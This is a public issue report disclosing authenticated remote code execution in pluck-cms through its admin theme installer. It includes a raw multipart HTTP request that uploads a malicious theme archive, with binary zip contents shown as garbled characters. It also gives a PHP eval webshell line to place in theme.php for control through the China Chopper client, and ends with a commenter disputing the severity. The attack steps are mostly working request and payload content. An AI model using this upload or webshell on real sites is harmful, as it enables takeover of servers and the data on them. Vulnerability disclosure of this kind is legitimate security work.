pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme
SecurityCN opened this issue · comments
pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme
Demo:
After the installation is successful, go to the management background.
options->choose theme->install theme
vul-url:
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:
Insert phpinfo(); in the theme.php file;
upload
POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------10771789627341
Content-Length: 2441
-----------------------------10771789627341
Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
Content-Type: application/x-zip-compressed
PK��� 楽VO
shell.php/PK��� � 漇VO?K�? �� � shell.php/info.phpe幧
?�嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
�?0?z?�N%???
?.?魫G_�?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??�桯[?>?�镗G�4慺蓈3阒F魠�?PK��� � 嫇OO蘺貔{� ? � shell.php/style.css誚M彌0�=o~叆≧籞睝毻*?鞧玘zj?�喐k02&洿??�
唋音凿惸虥?笃N溃=??p鴾�^f?r婆
M?险{=箞y&?鞼鑷 A�n圖呔贸&丨^皭b懶l呠|窞糔&x舎?�m桡镛C?;镈$?K?�霥@8[ZPIⅢ?攖K蚊n鴸?簟z�囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?
檢n垭"荙D长?�?歭?y嬟〕
罸璤h$7+碶ㄤ脩0U蘺A祎A�啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<�y 挛銫頥ク�6Do莀茇猰?緂??靷?Jw咁n栽讘<�?Es貦汛竻�覦嬄颖�k墐偝瞆| �!紂[垄
ZN?刅}恶郎溃+=pGU菥|/梿倩?�??MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴�?傗?氶﹚�x桷挩?钨(亵袪昀�鯫2?�?蛸�_江陰踴灶歳鐼_鳜og蹪~顳衜碬�K瞍m覐]@-锾?鐠�游J璋梀伶c�;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_ ?IC|??NA�?&�fわ?�姚.潥4�鉵5u尕o蝜?,�?ぢ?蟲?黋 _炧膿胬7?�偶睊�>I*�盡{;Dk�嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|�?蕠瓞F/?霭澅琽瞀盡�k睬辵4_簝I鸜�捚?�O�N扇惋帖�?闂鷍 8?$=睋
瀭?T窰1[�m觊D))
?还^gT�€�郪�3
蚾€i擣 服h爓,(英?
_!婀i線郯*GO�.%W抝�c摫胎?B痤lAⅤ萿酊�PK��� � 筍VO鱪鷸? ? � shell.php/theme.php}S羘贎�=�?橒睩*?9�?�寓:�%FmOh?鉛斓e痗慂褫怠敀驸�蠜麈i<�M?�J�?BY��*F圖?JI�?牟D�\��猟飔;�#!戂d避豸+锳V 顒采}C 嶳 ???BF欇�v;�ot=?
~�?佌鷵繕傉斠Y0?_?�\?<〣剨淫?+V*浚串kЬu瞓K僄?*�襼賞�鍀;?Md9~C?
�-?Mw 撣闭n�?�~鵼��B苪l`敞�7)*f聻?�=6=g|o"�?
3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐 灛輁X;
i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗�M箔悗?忨T?e�鼈<锌馏���g鐢'U�右\曞5瘹鉙<^�5w琮�PK��? � 楽VO
$ � shell.php/
� � 柭萵€堈�梷Kt€堈�袘€]y堈�PK��? � � 漇VO?K�? �� � $ ( shell.php/info.php
� � �4=t€堈�u�7瘈堈�]�?|堈�PK��? � � 嫇OO蘺貔{� ? � $ �� shell.php/style.css
� � €怷DC冋�)A7瘈堈��l洹|堈�PK��? � � 筍VO鱪鷸? ? � $ ? shell.php/theme.php
� � 9晸€堈�yg7瘈堈�?察z堈�PK�� � � ? ?
-----------------------------10771789627341
Content-Disposition: form-data; name="submit"
Upload
-----------------------------10771789627341--
1.default theme
View site
2.choose shell.php theme
View site http://192.168.80.1/pluck-4.7.10-dev3/
phpinfo();Function is executed
The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version
Add the following code to theme.php to getshell
; phpinfo(); ?>
<?php @eval($_POST[c]);
Use chopper connect
This is not an exploit. This like inserting the text hacked in the page..
there is no way to upload the theme without knowing the password, and there is no way into tricking an unsuspecting victim to fall for this.